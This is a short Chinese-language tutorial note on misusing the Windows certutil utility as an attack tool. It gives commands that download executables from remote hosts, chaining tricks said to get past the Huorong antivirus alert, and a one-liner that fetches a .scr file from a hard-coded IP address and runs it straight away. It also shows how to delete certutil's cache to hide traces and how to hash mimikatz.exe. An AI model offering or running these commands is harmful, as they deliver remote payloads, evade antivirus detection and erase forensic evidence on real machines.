普通的下载命令:
certutil -urlcache -split -f http://test.com/360.exe

image-20210924141912563

可以看到火绒都报警了,简单绕过(火绒。。。过不了只要是下载exe字段都会报警):

certutil & certutil -urlcache -split -f http://test.com/360.exe
certutil | certutil -urlcache -split -f http://test.com/360.exe
certutil | certutil -urlcache -split -f http://47.99.168.203/fastjson反序列化分析2.scr && .\fastjson反序列化分析2.scr

certutil会产生很多缓存:

certutil -urlcache *

image-20210924144024588

如何让certutil命令没有缓存:

certutil -urlcache -split -f http://io.com delete

当然也可以清除完:

certutil -urlcache * delete

certutil 校验hash值

certutil -hashfile mimikatz.exe MD5
certutil -hashfile mimikatz.exe SHA1   //检验SHA1
certutil -hashfile mimikatz.exe SHA256 //检验SHA256

image-20210924153722960

学习参考:https://forum.butian.net/share/612